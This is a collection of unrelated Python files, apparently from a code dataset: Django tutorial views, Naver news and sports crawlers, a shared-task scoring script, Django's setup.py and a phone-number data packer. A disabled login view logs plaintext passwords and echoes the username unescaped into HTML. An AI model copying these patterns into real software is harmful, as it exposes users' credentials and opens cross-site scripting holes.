# We make use of the shortcut function to make our lives easier.
# Note that the first parameter is the template we wish to use.
return render(request, 'rango/about/index.html', context_dict)
def category(request, category_name_slug):
context_dict = {}
context_dict['result_list'] = None
context_dict['query'] = None
if request.method == 'POST':
query = request.POST.get('query', '').strip()
if query:
# Run our Bing function to get the results list!
result_list = run_query(query)
context_dict['result_list'] = result_list
context_dict['query'] = query
try:
category = Category.objects.get(slug=category_name_slug)
context_dict['category_name'] = category.name
pages = Page.objects.filter(category=category).order_by('-views')
context_dict['pages'] = pages
context_dict['category'] = category
except Category.DoesNotExist:
pass
if not context_dict['query']:
context_dict['query'] = category.name
return render(request, 'rango/category.html', context_dict)
@login_required
def add_category(request):
# A HTTP POST?
if request.method == 'POST':
form = CategoryForm(request.POST)
# Have we been provided with a valid form?
if form.is_valid():
# Save the new category to the database.
form.save(commit=True)
# Now call the index() view.
# The user will be shown the homepage.
return index(request)
else:
# The supplied form contained errors - just print them to the terminal.
print form.errors
else:
# If the request was not a POST, display the form to enter details.
form = CategoryForm()
# Bad form (or form details), no form supplied...
# Render the form with error messages (if any).
return render(request, 'rango/add_category.html', {'form': form})
@login_required
def add_page(request, category_name_slug):
try:
cat = Category.objects.get(slug=category_name_slug)
except Category.DoesNotExist:
cat = None
if request.method == 'POST':
form = PageForm(request.POST)
if form.is_valid():
if cat:
page = form.save(commit=False)
page.category = cat
page.views = 0
page.save()
# probably better to use a redirect here.
return category(request, category_name_slug)
else:
print form.errors
else:
form = PageForm()
context_dict = {'form':form, 'category': cat}
return render(request, 'rango/add_page.html', context_dict)
'''
def register(request):
# A boolean value for telling the template whether the registration was successful.
# Set to False initially. Code changes value to True when registration succeeds.
registered = False
# If it's a HTTP POST, we're interested in processing form data.
if request.method == 'POST':
# Attempt to grab information from the raw form information.
# Note that we make use of both UserForm and UserProfileForm.
user_form = UserForm(data=request.POST)
profile_form = UserProfileForm(data=request.POST)
# If the two forms are valid...
if user_form.is_valid() and profile_form.is_valid():
# Save the user's form data to the database.
user = user_form.save()
# Now we hash the password with the set_password method.
# Once hashed, we can update the user object.
user.set_password(user.password)
user.save()
# Now sort out the UserProfile instance.
# Since we need to set the user attribute ourselves, we set commit=False.
# This delays saving the model until we're ready to avoid integrity problems.
profile = profile_form.save(commit=False)
profile.user = user
# Did the user provide a profile picture?
# If so, we need to get it from the input form and put it in the UserProfile model.
if 'picture' in request.FILES:
profile.picture = request.FILES['picture']
# Now we save the UserProfile model instance.
profile.save()
# Update our variable to tell the template registration was successful.
registered = True
# Invalid form or forms - mistakes or something else?
# Print problems to the terminal.
# They'll also be shown to the user.
else:
print user_form.errors, profile_form.errors
# Not a HTTP POST, so we render our form using two ModelForm instances.
# These forms will be blank, ready for user input.
else:
user_form = UserForm()
profile_form = UserProfileForm()
# Render the template depending on the context.
return render(request,
'rango/register.html',
{'user_form': user_form, 'profile_form': profile_form, 'registered': registered} )
def user_login(request):
# If the request is a HTTP POST, try to pull out the relevant information.
if request.method == 'POST':
# Gather the username and password provided by the user.
# This information is obtained from the login form.
username = request.POST['username']
password = request.POST['password']
# Use Django's machinery to attempt to see if the username/password
# combination is valid - a User object is returned if it is.
user = authenticate(username=username, password=password)
# If we have a User object, the details are correct.
# If None (Python's way of representing the absence of a value), no user
# with matching credentials was found.
if user:
# Is the account active? It could have been disabled.
if user.is_active:
# If the account is valid and active, we can log the user in.
# We'll send the user back to the homepage.
login(request, user)
return HttpResponseRedirect('/rango/')
else:
# An inactive account was used - no logging in!
return HttpResponse("Your Rango account is disabled.")
else:
# Bad login details were provided. So we can't log the user in.
print "Invalid login details: {0}, {1}".format(username, password)
return HttpResponse("Hey <strong>{0}</strong>, your login details are invalid.<ul><li><a href='../../rango/login/'>Please try again</a>.</li></ul>".format(username))
# The request is not a HTTP POST, so display the login form.
# This scenario would most likely be a HTTP GET.
else:
# No context variables to pass to the template system, hence the
# blank dictionary object...
return render(request, 'rango/login.html', {})
# Use the login_required() decorator to ensure only those logged in can access the view.
@login_required
def user_logout(request):
# Since we know the user is logged in, we can now just log them out.
logout(request)
# Take the user back to the homepage.
return HttpResponseRedirect('/rango/')
'''
def restricted(request):
# Construct a dictionary to pass to the template engine as its context.
# Note the key boldmessage is the same as {{ boldmessage }} in the template!
context_dict = {'boldmessage': "Oops :)"}
# Return a rendered response to send to the client.
# We make use of the shortcut function to make our lives easier.
# Note that the first parameter is the template we wish to use.
return render(request, 'rango/restricted.html', context_dict)
def search(request):
result_list = []
if request.method == 'POST':
query = request.POST['query'].strip()
if query:
# Run our Bing function to get the results list!
result_list = run_query(query)
return render(request, 'rango/search.html', {'result_list': result_list})
def track_url(request):
page_id = None
url = '/rango/'
if request.method == 'GET':
if 'page_id' in request.GET:
page_id = request.GET['page_id']
try:
page = Page.objects.get(id=page_id)
page.views = page.views + 1
page.save()
url = page.url
except:
pass
return redirect(url)
@login_required
def register_profile(request):
if request.method == 'POST':
profile_form = UserProfileForm(data=request.POST)
if profile_form.is_valid():
profile = profile_form.save(commit=False)
profile.user = User.objects.get(id=request.user.id)
if 'picture' in request.FILES:
try:
profile.picture = request.FILES['picture']
except:
pass
profile.save()
return redirect('index')
else:
profile_form = UserProfileForm()
return render(request, 'registration/profile_registration.html', {'profile_form': profile_form})
@login_required
def profile(request, user_id = None):
if user_id is not None:
context_dict = {'user': User.objects.get(id=user_id)}
else:
context_dict = {'user': User.objects.get(id=request.user.id)}
try:
context_dict['profile'] = UserProfile.objects.get(user=context_dict['user'])
except:
context_dict['profile'] = None
context_dict['myprofile'] = user_id is None or user_id == request.user.id
return render(request, 'registration/profile.html', context_dict)
@login_required
def edit_profile(request):
try:
users_profile = UserProfile.objects.get(user=request.user)
except:
users_profile = None
if request.method == 'POST':
profile_form = UserProfileForm(data=request.POST, instance=users_profile)
if profile_form.is_valid():
profile_updated = profile_form.save(commit=False)
if users_profile is None:
profile_updated.user = User.objects.get(id=request.user.id)
if 'picture' in request.FILES:
try:
profile_updated.picture = request.FILES['picture']
except:
pass
profile_updated.save()
return redirect('profile')
else:
form = UserProfileForm(instance=users_profile)
return render(request, 'registration/profile_edit.html', {'profile_form': form})
@login_required
def user_list(request):
users = User.objects.all()
return render(request, 'registration/user_list.html', {'users': users})
def bad_url(request):
return render(request, 'rango/nopage.html')
``` |
{
"source": "20-2-SKKU-OSS/2020-2-OSS-6-Project",
"score": 3
} |
#### File: 2020-2-OSS-6-Project/korea_news_crawler/articlecrawler.py
```python
from time import sleep
from bs4 import BeautifulSoup
from multiprocessing import Process
from korea_news_crawler.exceptions import *
from korea_news_crawler.articleparser import ArticleParser
from korea_news_crawler.writer import Writer
import os
import platform
import calendar
import requests
import re
from newspaper import Article
class ArticleCrawler(object):
def __init__(self):
choosen_categories = self.get_catergory()
self.categories = {'정치': 100, '경제': 101, '사회': 102, '생활문화': 103, '세계': 104, 'IT과학': 105, '오피니언': 110,
'politics': 100, 'economy': 101, 'society': 102, 'living_culture': 103, 'world': 104, 'IT_science': 105, 'opinion': 110}
self.selected_categories = []
self.date = {'start_year': 0, 'start_month': 0, 'end_year': 0, 'end_month': 0}
self.get_date()
self.set_date_range(self.date['start_year'],self.date['start_month'],self.date['end_year'],self.date['end_month'])
self.user_operating_system = str(platform.system())
self.set_category(choosen_categories)
self.keyword = self.get_keyword()
def get_catergory(self):
print("카테고리 : 정치 , 경제 , 사회 , 생활문화 , 세계 , IT과학 , 오피니언, 연합뉴스속보")
print("원하는 카테고리를 입력 하세요(공백으로 구분) : ",end ='')
choosen_categories = input()
choosen_list = choosen_categories.split(' ')
print(choosen_list)
return choosen_list
def get_date(self):
print("크롤링을 원하는 날짜 기간을 입력하세요 ")
for keys in self.date.keys() :
print(keys + " : ",end= '')
get_date = int(input())
self.date[keys] = get_date
##########################################################
def get_keyword(self):
keyword = 'initvalue'
ynkeyword = input("기사 제목 키워드 찾기 기능을 사용하시겠습니까? (y/n) :")
if ynkeyword == "n" or ynkeyword == "N":
return keyword
elif ynkeyword == "y" or ynkeyword == "Y":
keyword = input("원하는 키워드를 입력해주세요 :")
return keyword
else:
print("invalid input")
return keyword
##########################################################
def set_category(self, args):
for key in args:
if self.categories.get(key) is None and key != '연합뉴스속보':
raise InvalidCategory(key)
self.selected_categories = args
def set_date_range(self, start_year, start_month, end_year, end_month):
args = [start_year, start_month, end_year, end_month]
if start_year > end_year:
raise InvalidYear(start_year, end_year)
if start_month < 1 or start_month > 12:
raise InvalidMonth(start_month)
if end_month < 1 or end_month > 12:
raise InvalidMonth(end_month)
if start_year == end_year and start_month > end_month:
raise OverbalanceMonth(start_month, end_month)
for key, date in zip(self.date, args):
self.date[key] = date
print(self.date)
@staticmethod
def make_news_page_url(category_url, start_year, end_year, start_month, end_month):
made_urls = []
for year in range(start_year, end_year + 1):
print(year)
if start_year == end_year:
year_startmonth = start_month
year_endmonth = end_month
else:
if year == start_year:
year_startmonth = start_month
year_endmonth = 12
elif year == end_year:
year_startmonth = 1
year_endmonth = end_month
else:
year_startmonth = 1
year_endmonth = 12
for month in range(year_startmonth, year_endmonth + 1):
for month_day in range(1, calendar.monthrange(year, month)[1] + 1):
if len(str(month)) == 1:
month = "0" + str(month)
if len(str(month_day)) == 1:
month_day = "0" + str(month_day)
# 날짜별로 Page Url 생성
url = category_url + str(year) + str(month) + str(month_day)
# totalpage는 네이버 페이지 구조를 이용해서 page=10000으로 지정해 totalpage를 알아냄
# page=10000을 입력할 경우 페이지가 존재하지 않기 때문에 page=totalpage로 이동 됨 (Redirect)
totalpage = ArticleParser.find_news_totalpage(url + "&page=10000")
for page in range(1, totalpage + 1):
made_urls.append(url + "&page=" + str(page))
return made_urls
@staticmethod
def get_url_data(url, max_tries=10):
remaining_tries = int(max_tries)
while remaining_tries > 0:
try:
headers1 = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
return requests.get(url, headers=headers1)
except requests.exceptions:
sleep(60)
remaining_tries = remaining_tries - 1
raise ResponseTimeout()
def crawling(self, category_name):
# Multi Process PID
print(category_name + " PID: " + str(os.getpid()))
writer = Writer(category_name=category_name, date=self.date)
# 기사 URL 형식
if (category_name == "연합뉴스속보"):
url = "http://news.naver.com/main/list.nhn?mode=LPOD&mid=sec&sid1=001&sid2=140&oid=001&isYeonhapFlash=Y" \
+ "&date="
else:
url = "http://news.naver.com/main/list.nhn?mode=LSD&mid=sec&sid1=" + str(
self.categories.get(category_name)) + "&date="
# start_year년 start_month월 ~ end_year의 end_month 날짜까지 기사를 수집합니다.
day_urls = self.make_news_page_url(url, self.date['start_year'], self.date['end_year'], self.date['start_month'], self.date['end_month'])
print(category_name + " Urls are generated")
print("The crawler starts")
for URL in day_urls:
print(URL)
regex = re.compile("date=(\d+)")
news_date = regex.findall(URL)[0]
request = self.get_url_data(URL)
document = BeautifulSoup(request.content, 'html.parser')
# html - newsflash_body - type06_headline, type06
# 각 페이지에 있는 기사들 가져오기
if (category_name == "연합뉴스속보"):
post_temp = document.select('.newsflash_body .type02 li ')
else:
post_temp = document.select('.newsflash_body .type06_headline li dl')
post_temp.extend(document.select('.newsflash_body .type06 li dl'))
# 각 페이지에 있는 기사들의 url 저장
post = []
headlines = []
companys = []
for line in post_temp:
post.append(line.a.get('href')) # 해당되는 page에서 모든 기사들의 URL을 post 리스트에 넣음
try:
companys.append(line.find('span', class_="writing").text)
except:
companys.append("err")
try:
h = line.find_all('a')
if len(h) > 1:
headlines.append(h[1].text)
elif len(h) == 1:
headlines.append(h[0].text)
else:
headlines.append("err")
except:
headlines.append("err")
del post_temp
print(len(post))
for i in range(len(post)): # 기사 URL
# 크롤링 대기 시간
print(i)
sleep(0.01)
content_url = post[i]
# 기사 HTML 가져옴
try:
article = Article(content_url, language='ko')
article.download()
article.parse()
text_sentence = article.text.strip()
text_company = companys[i]
text_headline = headlines[i].strip()
######################################################################
if self.keyword == 'initvalue':
wcsv = writer.get_writer_csv()
wcsv.writerow([news_date, category_name, text_company, text_headline, text_sentence, content_url])
else:
headline_to_words = text_headline.split()
if headline_to_words.index(self.keyword) >= 0:
wcsv = writer.get_writer_csv()
wcsv.writerow([news_date, category_name, text_company, text_headline, text_sentence, content_url])
######################################################################
except Exception as err:
print(err)
writer.close()
return
def start(self, isMultiProc):
# MultiProcess 크롤링 시작
for category_name in self.selected_categories:
if isMultiProc:
proc = Process(target=self.crawling, args=(category_name,))
proc.start()
else:
self.crawling(category_name)
if __name__ == "__main__":
Crawler = ArticleCrawler()
#Crawler.set_category("생활문화", "IT과학")
#Crawler.set_date_range(2017, 1, 2018, 4)
Crawler.start()
``` |
{
"source": "20-2-SKKU-OSS/2020-OSS-2-11",
"score": 3
} |
#### File: 2020-OSS-2-11/_KoreaNewsCrawler/sportcrawler.py
```python
from bs4 import BeautifulSoup
from time import sleep
import calendar
import csv
import requests
import re
import json
from exceptions import *
from multiprocessing import Process
class SportCrawler:
def __init__(self):
self.category = {'한국야구': "kbaseball",'해외야구': "wbaseball",'해외축구' : "wfootball",
'한국축구': "kfootball", '농구': "basketball", '배구': "volleyball", '일반 스포츠': "general", 'e스포츠': "esports"}
self.selected_category = []
self.selected_urlcategory=[]
self.date = {'startyear': 0,'startmonth':0, 'endyear': 0, 'endmonth': 0}
def javascript_totalpage(self, url):
totalpage_url = url +"&page=10000"
request_content = requests.get(totalpage_url,headers={'User-Agent':'Mozilla/5.0'})
pagenumber = re.findall('\"totalPages\":(.*)}',request_content.text)
return int(pagenumber[0])
def content(self, html_document, url_label):
label = url_label
content_match = []
Tag = html_document.find_all('script', {'type': 'text/javascript'})
Tag_ = re.sub(',"officeName', '\nofficeName', str(Tag))
regex = re.compile('oid":"(?P<oid>\d+)","aid":"(?P<aid>\d+)"')
content = regex.findall(Tag_)
for oid_aid in content:
maked_url = "https://sports.news.naver.com/" + label + "/news/read.nhn?oid=" + oid_aid[0] + "&aid=" + \
oid_aid[1]
content_match.append(maked_url)
return content_match
def Clearcontent(self, text):
remove_special = re.sub('[\{\}\[\]\/?,;:|\)*~`!^\-_+<>@\#$%&n▲▶◆◀■\\\=\(\'\"]', '', text)
remove_author = re.sub('\w\w\w 기자', '', remove_special)
remove_flasherror = re.sub(
'본문 내용|TV플레이어| 동영상 뉴스|flash 오류를 우회하기 위한 함수 추가fuctio flashremoveCallback|tt|t|앵커 멘트|xa0', '', remove_author)
remove_strip = remove_flasherror.strip().replace(' ', '') # 공백 에러 삭제
reverse_content = ''.join(reversed(remove_strip)) # 기사 내용을 reverse 한다.
cleared_content = ''
for i in range(0, len(remove_strip)):
if reverse_content[
i:i + 2] == '.다': # 기사가 reverse 되었기에 ".다"로 기사가 마무리 되므로, 이를 탐색하여 불필요한 정보를 모두 지운다.
cleared_content = ''.join(reversed(reverse_content[i:]))
break
cleared_content=re.sub('if deployPhase(.*)displayRMCPlayer ','',cleared_content)
return cleared_content
def Clearheadline(self, text):
first = re.sub('[\{\}\[\]\/?,;:|\)*~`!^\-_+<>@\#$%&n▲▶◆◀■\\\=\(\'\"]', '', text)
return first
def Make_url(self, URL, startyear, lastyear, startmonth, lastmonth):
Maked_url = []
final_startmonth = startmonth
final_lastmonth = lastmonth
for year in range(startyear, lastyear + 1):
if year != lastyear:
startmonth = 1
lastmonth = 12
else:
startmonth = final_startmonth
lastmonth = final_lastmonth
for Month in range(startmonth, lastmonth + 1):
for Month_Day in range(1, calendar.monthrange(year, Month)[1] + 1):
url = URL
if len(str(Month)) == 1:
Month = "0" + str(Month)
if len(str(Month_Day)) == 1:
Month_Day = "0" + str(Month_Day)
url = url + str(year) + str(Month) + str(Month_Day)
final_url = url # page 날짜 정보만 있고 page 정보가 없는 url 임시 저장
totalpage = self.javascript_totalpage(url) # TotalPage 확인
for page in range(1, totalpage + 1):
url = final_url # url page 초기화
url = url + "&page=" + str(page)
Maked_url.append(url) # [[page1,page2,page3 ....]
return Maked_url
def crawling(self, category_name):
Url_category = []
Category = []
Category.append(category_name)
Url_category.append(self.category[category_name])
titlescript = []
officename_script = []
completed_content_match = []
timescript=[]
for url_label in Url_category: # URL 카테고리. Multiprocessing시 어차피 1번 도는거라 refactoring할 필요 있어보임
category = Category[Url_category.index(url_label)] # URL 인덱스와 Category 인덱스가 일치할 경우 그 값도 일치
url = "https://sports.news.naver.com/" + url_label + "/news/list.nhn?isphoto=N&view=photo&date="
final_urlday = self.Make_url(url,self.date['startyear'],
self.date['endyear'], self.date['startmonth'], self.date['endmonth'])
print("succeed making url")
if len(str(self.date['startmonth'])) == 2:
startmonth=str(self.date['startmonth'])
else:
startmonth='0'+str(self.date['startmonth'])
if len(str(self.date['endmonth']))==2:
endmonth=str(self.date['endmonth'])
else:
endmonth='0'+str(self.date['endmonth'])
file = open("Sport_" + category + "_"+str(self.date['startyear'])+str(startmonth)
+"_"+str(self.date['endyear'])+str(endmonth)+".csv", 'w', encoding='euc-kr', newline='')
wcsv = csv.writer(file)
hefscript2=[]
for list_page in final_urlday: # Category Year Month Data Page 처리 된 URL
# 제목 / URL
request_content = requests.get(list_page, headers={'User-Agent': 'Mozilla/5.0'})
content_dict = json.loads(request_content.text)
hefscript = []
for contents in content_dict["list"]:
oid = contents['oid']
aid = contents['aid']
titlescript.append(contents['title'])
timescript.append(contents['datetime'])
hefscript.append("https://sports.news.naver.com/news.nhn?oid=" + oid + "&aid=" + aid)
hefscript2.append("https://sports.news.naver.com/news.nhn?oid=" + oid + "&aid=" + aid)
officename_script.append(contents['officeName'])
# 본문
# content page 기반하여 본문을 하면 된다. text_sentence에 본문을 넣고 Clearcontent진행 후 completed_conten_match에 append해주면 된다.
# 추가적으로 pass_match에 언론사를 집어넣으면 된다.
for content_page in hefscript:
sleep(0.01)
content_request_content = requests.get(content_page, headers={'User-Agent': 'Mozilla/5.0'})
content_document_content = BeautifulSoup(content_request_content.content, 'html.parser')
content_Tag_content = content_document_content.find_all('div', {'class': 'news_end'},
{'id': 'newsEndContents'})
text_sentence = '' # 뉴스 기사 본문 내용 초기화
try:
text_sentence = text_sentence + str(content_Tag_content[0].find_all(text=True))
completed_content_match.append(self.Clearcontent(text_sentence))
except:
pass
# Csv 작성
for csvtimeline, csvheadline, csvcontent, csvpress, csvurl in zip(timescript,titlescript, completed_content_match, officename_script,hefscript2):
try:
if not csvtimeline:
continue
if not csvheadline:
continue
if not csvcontent:
continue
if not csvpress:
continue
wcsv.writerow([csvtimeline, self.Clearheadline(csvheadline), csvcontent, csvpress, category,csvurl])
except:
pass
file.close()
def set_category(self, *args):
for key in args:
if self.category.get(key) is None:
raise InvalidCategory(key)
self.selected_category = args
for selected in self.selected_category:
self.selected_urlcategory.append(self.category[selected])
def start(self):
# MultiProcess 크롤링 시작
for category_name in self.selected_category:
proc = Process(target=self.crawling, args=(category_name,))
proc.start()
def set_date_range(self,a,b,c,d):
self.date['startyear'] = a
self.date['startmonth'] = b
self.date['endyear'] = c
self.date['endmonth'] = d
# Main
if __name__ == "__main__":
Spt_crawler = SportCrawler()
Spt_crawler.set_category('한국야구','한국축구')
Spt_crawler.set_date_range(2017,4,2018,1)
Spt_crawler.start()
``` |
{
"source": "2030NLP/SpatialCognEval2021",
"score": 3
} |
#### File: SpatialCognEval2021/ref/evaluate.py
```python
import json
def formatter(_data, _meta):
"""
将数据转换成用于提交和评分的格式。
:param _data:
参考数据集中 [x]-[set]-with-answer.json 文件的格式,
用参赛系统给 [x]-[dev/test].json 中读出的对象列表添加 judge1 或/和 judge2 字段,
然后直接将添加了答案字段的三个任务dev集(或test集)中的所有数据全都放在一个 List 里,构成此参数。
:param _meta: 参赛队伍的关键信息,用来呈现在排行榜。
:return: 符合用于提交和评分的格式的数据,称之为"答卷"。
"""
_sheet = {'meta': {
'team_name': _meta['team_name'], # 队伍名称
'institution': _meta['institution'], # 机构(简称)
'email': _meta['email'], # 联系邮箱
}}
_methods = {
'1': lambda _item: int(_item['judge1']),
'2': lambda _item: int(_item['judge2']),
'3': lambda _item: [int(_item['judge1']), int(_item['judge2'])],
}
for _item in _data:
_task_id, _set_type, _item_id = _item['qID'].split('-')
_key = f"subtask{_task_id}-{_set_type}"
if (_set_type == 'dev' or _set_type == 'val' or _set_type == 'test') and _key not in _sheet:
_sheet[_key] = {}
_sheet[_key][_item_id] = _methods[_task_id](_item)
# print(_sheet)
# print(json.dumps(_sheet, ensure_ascii=False))
return json.dumps(_sheet)
def subtask1_eval(_answers, _ref):
"""
子任务1的评分函数。
:param _answers: 答卷答案。
:param _ref: 参考答案。
:return: 统计数据对象。
"""
_map = {
'11': 'TP',
'00': 'TN',
'10': 'FN',
'01': 'FP',
}
_st = {
'TP': 0,
'TN': 0,
'FN': 0,
'FP': 0,
}
for _k, _v in _ref.items():
_ga = int(_v)
_aa = int(_answers[_k]) if _k in _answers else 0
_st[_map[f"{_ga}{_aa}"]] += 1
_st['Accuracy'] = (_st['TP'] + _st['TN']) / (_st['TP'] + _st['FP'] + _st['FN'] + _st['TN'])
return _st
def subtask2_eval(_answers, _ref):
"""
子任务2的评分函数,与子任务1算法一致。
:param _answers: 答卷答案。
:param _ref: 参考答案。
:return: 统计数据对象。
"""
return subtask1_eval(_answers, _ref)
def subtask3_eval(_answers, _ref):
"""
子任务3的评分函数。
:param _answers: 答卷答案。
:param _ref: 参考答案。
:return: 统计数据对象。
"""
_map_1 = {
'11': 'TP_1',
'00': 'TN_1',
'10': 'FN_1',
'01': 'FP_1',
}
_map_2 = {
'11': 'TP_2',
'00': 'TN_2',
# '10': 'FN_2',
# '01': 'FP_2',
}
_st = {
'TP_1': 0,
'TN_1': 0,
'FN_1': 0,
'FP_1': 0,
'TP_2': 0,
'TN_2': 0,
# 'FN_2': 0,
# 'FP_2': 0,
}
for _k, _v in _ref.items():
_ga = int(_v[0])
_aa = int(_answers[_k][0]) if _k in _answers else 0
_st[_map_1[f"{_ga}{_aa}"]] += 1
_gb = int(_v[1])
_ab = int(_answers[_k][1]) if _k in _answers else 0
if _aa == 0 == _ga and _gb == _ab:
_st[_map_2[f"{_gb}{_ab}"]] += 1
_st['Precision'] = (_st['TP_2'] + _st['TN_2']) / (_st['TN_1'] + _st['FN_1']) \
if (_st['TN_1'] + _st['FN_1']) != 0 else 0
_st['Recall'] = (_st['TP_2'] + _st['TN_2']) / (_st['TN_1'] + _st['FP_1']) \
if (_st['TN_1'] + _st['FP_1']) != 0 else 0
_st['F1'] = 2 * _st['Precision'] * _st['Recall'] / (_st['Precision'] + _st['Recall']) \
if (_st['Precision'] + _st['Recall']) != 0 else 0
return _st
def evaluate(_sheet, _ref1, _ref2, _ref3):
_result = {
'meta': _sheet['meta'],
'subtask1': subtask1_eval(_sheet['subtask1-dev'], _ref1),
'subtask2': subtask2_eval(_sheet['subtask2-dev'], _ref2),
'subtask3': subtask3_eval(_sheet['subtask3-dev'], _ref3),
}
return _result
if __name__ == '__main__':
#
dev_or_test = 'dev' # or 'test'
meta = {
'team_name': "某某队", # 队伍名称
'institution': "某某大学", # 机构(简称)
'email': "<EMAIL>", # 联系邮箱
}
#
my_path_1 = f'/YOUR/PATH/OF/task1-{dev_or_test}-with-answer.json'
my_path_2 = f'/YOUR/PATH/OF/task2-{dev_or_test}-with-answer.json'
my_path_3 = f'/YOUR/PATH/OF/task3-{dev_or_test}-with-answer.json'
answers = []
for path in [my_path_1, my_path_2, my_path_3]:
with open(path, 'r', encoding='utf-8') as f:
task_answers = json.loads(f.read())
answers += task_answers
sheet = json.loads(formatter(answers, meta))
#
ref_path_1 = f'/PATH/OF/task1-{dev_or_test}-with-answer.json'
ref_path_2 = f'/PATH/OF/task2-{dev_or_test}-with-answer.json'
ref_path_3 = f'/PATH/OF/task3-{dev_or_test}-with-answer.json'
answers = []
for path in [ref_path_1, ref_path_2, ref_path_3]:
with open(path, 'r', encoding='utf-8') as f:
task_answers = json.loads(f.read())
answers += task_answers
refs = json.loads(formatter(answers, meta))
#
that = evaluate(sheet, refs[f'subtask1-{dev_or_test}'], refs[f'subtask2-{dev_or_test}'], refs[f'subtask3-{dev_or_test}'])
print(that)
pass
``` |
{
"source": "2032341565/django",
"score": 2
} |
#### File: 2032341565/django/setup.py
```python
import os
import sys
from distutils.sysconfig import get_python_lib
from setuptools import find_packages, setup
CURRENT_PYTHON = sys.version_info[:2]
REQUIRED_PYTHON = (3, 6)
# This check and everything above must remain compatible with Python 2.7.
if CURRENT_PYTHON < REQUIRED_PYTHON:
sys.stderr.write("""
==========================
Unsupported Python versionpyt
==========================
This version of Django requires Python {}.{}, but you're trying to
install it on Python {}.{}.
This may be because you are using a version of pip that doesn't
understand the python_requires classifier. Make sure you
have pip >= 9.0 and setuptools >= 24.2, then try again:
$ python -m pip install --upgrade pip setuptools
$ python -m pip install django
This will install the latest version of Django which works on your
version of Python. If you can't upgrade your pip (or Python), request
an older version of Django:
$ python -m pip install "django<2"
""".format(*(REQUIRED_PYTHON + CURRENT_PYTHON)))
sys.exit(1)
# Warn if we are installing over top of an existing installation. This can
# cause issues where files that were deleted from a more recent Django are
# still present in site-packages. See #18115.
overlay_warning = False
if "install" in sys.argv:
lib_paths = [get_python_lib()]
if lib_paths[0].startswith("/usr/lib/"):
# We have to try also with an explicit prefix of /usr/local in order to
# catch Debian's custom user site-packages directory.
lib_paths.append(get_python_lib(prefix="/usr/local"))
for lib_path in lib_paths:
existing_path = os.path.abspath(os.path.join(lib_path, "django"))
if os.path.exists(existing_path):
# We note the need for the warning here, but present it after the
# command is run, so it's more likely to be seen.
overlay_warning = True
break
EXCLUDE_FROM_PACKAGES = ['django.conf.project_template',
'django.conf.app_template',
'django.bin']
# Dynamically calculate the version based on django.VERSION.
version = __import__('django').get_version()
def read(fname):
with open(os.path.join(os.path.dirname(__file__), fname)) as f:
return f.read()
setup(
name='Django',
version=version,
python_requires='>={}.{}'.format(*REQUIRED_PYTHON),
url='https://www.djangoproject.com/',
author='Django Software Foundation',
author_email='<EMAIL>',
description=('A high-level Python Web framework that encourages '
'rapid development and clean, pragmatic design.'),
long_description=read('README.rst'),
license='BSD',
packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES),
include_package_data=True,
scripts=['django/bin/django-admin.py'],
entry_points={'console_scripts': [
'django-admin = django.core.management:execute_from_command_line',
]},
install_requires=['pytz', 'sqlparse'],
extras_require={
"bcrypt": ["bcrypt"],
"argon2": ["argon2-cffi >= 16.1.0"],
},
zip_safe=False,
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
],
project_urls={
'Documentation': 'https://docs.djangoproject.com/',
'Funding': 'https://www.djangoproject.com/fundraising/',
'Source': 'https://github.com/django/django',
'Tracker': 'https://code.djangoproject.com/',
},
)
if overlay_warning:
sys.stderr.write("""
========
WARNING!
========
You have just installed Django over top of an existing
installation, without removing it first. Because of this,
your install may now include extraneous files from a
previous version that have since been removed from
Django. This is known to cause a variety of problems. You
should manually remove the
%(existing_path)s
directory and re-install Django.
""" % {"existing_path": existing_path})
``` |
{
"source": "20326/packme",
"score": 3
} |
#### File: 20326/packme/phone_pack.py
```python
import argparse
import os
import struct
import codecs
import csv
import collections
from datetime import datetime
__author__ = 'brian'
__version__ = '1.0.0'
class DataConverter(object):
table = collections.OrderedDict()
tableData = collections.OrderedDict()
def __init__(self, cvs_file=None, out_file=None, version=None):
self.head_fmt = "<4si"
self.phone_fmt = "<iiB"
self.head_fmt_length = struct.calcsize(self.head_fmt)
self.phone_fmt_length = struct.calcsize(self.phone_fmt)
self.first_index_offset = 0
self.phone_record_count = 0
self.cvs_file = cvs_file
self.out_file = out_file
self.dat_version = str(version)
self.carriers = {
"移动": 1,
"联通": 2,
"电信": 3,
"中国移动": 1,
"中国联通": 2,
"中国电信": 3,
"电信虚拟运营商": 4,
"联通虚拟运营商": 5,
"移动虚拟运营商": 6,
"未知电信运营商": 7,
}
if cvs_file is None:
self.cvs_file = os.path.join(os.path.dirname(__file__), "mobile.1810.csv")
# index offset
index_offset = self.head_fmt_length
with codecs.open(self.cvs_file, mode='r') as FILE:
reader = csv.reader(FILE)
for row in reader:
self.phone_record_count = self.phone_record_count + 1
# if self.phone_record_count >10:
# break
# no prefix province city carrier region zipCode
# 1 1300000 山东 济南 中国联通 531 250000
# 记录区 中每条记录的格式为"<省份>|<城市>|<邮编>|<长途区号>\0"。 每条记录以'\0'结束;
# 索引区 中每条记录的格式为"<手机号前七位><记录区的偏移><卡类型>",每个索引的长度为9个字节;
no = int(row[1])
carrier = self.carriers.get(row[4], 7)
dat_str = "{}|{}|{}|{}\0".format(row[2], row[3], row[6], str(row[5]))
idx_name = "{}.{}.{}".format(row[0], row[1], row[6])
self.table[no] = {
"no": no,
"carrier": carrier,
"data": dat_str,
}
self.tableData[dat_str] = 0
def pack(self):
# ### 手机号归属地查询
# | 4 bytes | <- phone.dat 版本号(如:1701即17年1月份)
# ------------
# | 4 bytes | <- 第一个索引的偏移
# -----------------------
# | offset - 8 | <- 记录区
# -----------------------
# | index | <- 索引区
# -----------------------
#
# 1. 头部为8个字节,版本号为4个字节,第一个索引的偏移为4个字节;
# 2. 记录区 中每条记录的格式为"<省份>|<城市>|<邮编>|<长途区号>\0"。 每条记录以'\0'结束;
